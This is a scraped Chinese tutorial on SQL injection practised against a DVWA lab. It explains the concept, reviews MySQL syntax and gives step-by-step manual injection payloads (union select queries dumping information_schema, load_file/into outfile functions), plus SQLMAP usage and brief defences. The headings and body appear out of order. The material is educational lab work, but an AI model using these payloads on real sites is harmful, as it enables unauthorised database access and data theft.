先来通过乌云案例了解一下SQL注入的危害 示例1. 中国中化通过SQL注入获得对方服务器权限 **示例2:**飞特物流后台注入千万用户敏感数据泄漏(银行卡号、身份证照片) 其危害性可造成: 恶意攻击者将数据包中输入的参数拼接成SQL语句传递给Web服务器,由于Web服务器的开发人员对数据的合法性没有判断或过滤不严,进而传递给数据库服务器,从而导致拼接的恶意SQL命令被执行,发起SQL注入攻击。 一天,你老板让你去银行办理业务,临走前老板给了你一信封,上面写着银行业务员的指示,信件内容: 查询a账户的余额 路途中你去洗手间时将信件放到了洗手池上,被小偷发现了,打开信封添加了如下内容: 查询a账户余额,并向b账户转800元 银行业务员检查你的身份,验签了你老板的签名,便按照信函中操作(于是老板被偷了800元) 【和SQL注入相对比】 Web服务器 (你) 目的:模拟真实环境进行注入测试练习 环境安装如下所示(使用其它的靶机环境也可以。如搭建中遇到坎坷,可参考下方文章: 目的:注入的核心在于注入点构造的SQL语句,构造的SQL语句最终传递给数据库服务器,由数据库服务器去执行,因此欲想手工注入深入并了解其原理,需必备SQL基础命令 》》启动并进入数据库(MYSQL,看到如下msyql便成功进入) Tips:后面的数字超过查询表的列数时,会报错 》》union 联合查询(将两个表中同数量的列数打印出来) Tips:两个表的列数相对应时,才能查询成功 information_schema是mysql的一个特殊的信息数据库,保存关于Mysql服务器所维护的其它数据库信息,其中有三个特殊表 TIPS1:Mysql查询的字符串未闭合会报错 TIPS2:Mysql语句要分号结尾才能查询成功 TIPS3:Mysql的三种注释风格:”#”、”– “、”– +” TIPS4:Mysql SQL语句不区分大小写 这里使用DVWA SQL Injection面板的操作显示来进行一个前后端的交互过程以及web服务器和数据库服务器的交互过程,来使我们对SQL注入的原理有一步新的认识 》》在输入框中输入 “1 and 1=1”,未报错 问:“为何在此输入 1 and 1=1?” 问:“and 在SQL中的作用是什么?” 问:”我还是不太清楚为何使用and?“ 》》在输入框中输入 “1 and 1=2”,未报错,可判断为非数字型注入 问:”and 1=2 不是and右边的逻辑1=2不成立吗,为何又显示出了数据?“ 》》在输入框中输入 “1‘ “,报SQL语法错误(怀疑为字符型注入) 由此and逻辑可判断为此处对数据库进行where子语句查询时使用的单引号进行查询,且没有过滤措施 》》在输入框中输入 “1’ order by 1,2 #”,返回正常 由order by语句逻辑可以判断当前查询列为两列(first_name、last_name) 》》在输入框中输入 “1’ union select 1,2 #”,返回出显示位(这里暂时不知道几个,为方便理解我图中标记了下) 示例1:查询当前数据库名 , “1’ union select 1,database() #” 其它Mysql常用函数: system_user():系统用户名 Tips:我们可以利用前面 “3.2.2 MYSQL的特殊库” 中的三个特殊表去显示位中查询数据库中的数据 1’ union select 1,group_concat(schema_name) from information_schema.schemata; # TIPS:group_concat()函数能将查询拼接起来,直观显示 1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’; # 1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’; # 问:正确的注入语法但报错是什么原因? SQL注入神器排名第一当属SQLMAP,其功能强大体验便知 有关SQLMAP使用更加详细请看其官网或我总结的另外两篇文章: 部署防火墙 定期网站安全渗透测试
文章目录
一、SQL注入危害
1.1 实例
1.2 危害
二、SQL注入含义
2.1 含义
2.2 白话
签名:BOSS
签名:BOSS
数据库服务器(银行业务员)
合法SQL代码(老板签名)
恶意SQL命令(小偷添加字段)三、实操学习所需
3.1 靶机环境搭建
https://blog.csdn.net/Aaron_Miller/article/details/105735808)
3.2 SQL相关语法
3.2.1 SQL基本查询语法
》》查看当前数据库
》》进入dvwa数据库,并查看其所有数据表
》》查看表中内容(users,五行八列)
》》where语句(只查看user为1337这一行数据)
》》order by 排序(按照user名称进行排序)
3.2.2 MYSQL的特殊库
schema_name列
table_schema、table_name列
3.2.3 SQL语法注意事项
(注释后边的未闭合的引号,同时前边添加一个注释掉的分号)
四、手工注入实战(MYSQL)
4.1 手工注入过程
4.3 web服务器和数据库交互理解
4.2 手工注入操作
4.2.1 逻辑判断注入点
答:“通过SQL执行逻辑来判断当前注入点”
答:“and可在where子语句中将两个语句结合起来,and两边逻辑都正确时才返回true”
答:”请揣摩web服务器和数据库交互过程后仔细观察下方的图片“
答:“如果and在引号里面,整个引号里面的数据是一个逻辑1 and 1=2,1是true,因此返回true(意思就是如果在引号中使用and无实际意义)”
》》在输入框中输入 “1‘ and 1=1 #”,返回正常
》》在输入框中输入 “1‘ and 1=2; #”,没有数据返回:可判断为字符型注入
4.2.2 判断查询列数
》》在输入框中输入 “1’ order by 1,2,3 #”,返回语法错误
4.2.3 显示显示位
》》在输入框中输入 “1’ union select 1,2,3 #”,返回错误,验实2个显示位
4.2.4 SQL语句注入
user():数据库用户名
current_user() :当前用户名
session_user():连接数据库的用户名
database():数据库名
version() :数据库版本
Load_file():读取本地文件
Into outfile():写文件
@@datadir:读取数据存储路径
@@basedir:读取数据库安装路径
@@version_compile_os:显示安装版本4.2.5 爆数据
4.2.5.1 爆库
4.2.5.2 爆表
4.2.5.3 爆字段
4.2.5.4 爆数据
答:编码不统一所致,相同字段编码为utf8_general_ci与utf8_unicode_ci就会报如上错误:
解:修改表中编码即可解决
五、注入神器辅攻
5.1 SQLMAP介绍
5.2 查找注入点
存在注入点:
5.3 查看所有数据库
5.4 查看某库下表
5.5 查看某表的所有列
5.6 爆数据
5.7 SQL其它使用
六、注入防御措施
本网页所有视频内容由 imoviebox边看边下-网页视频下载, iurlBox网页地址收藏管理器 下载并得到。
ImovieBox网页视频下载器 下载地址: ImovieBox网页视频下载器-最新版本下载
本文章由: imapbox邮箱云存储,邮箱网盘,ImageBox 图片批量下载器,网页图片批量下载专家,网页图片批量下载器,获取到文章图片,imoviebox网页视频批量下载器,下载视频内容,为您提供.
阅读和此文章类似的: 全球云计算
官方软件产品操作指南 (170)
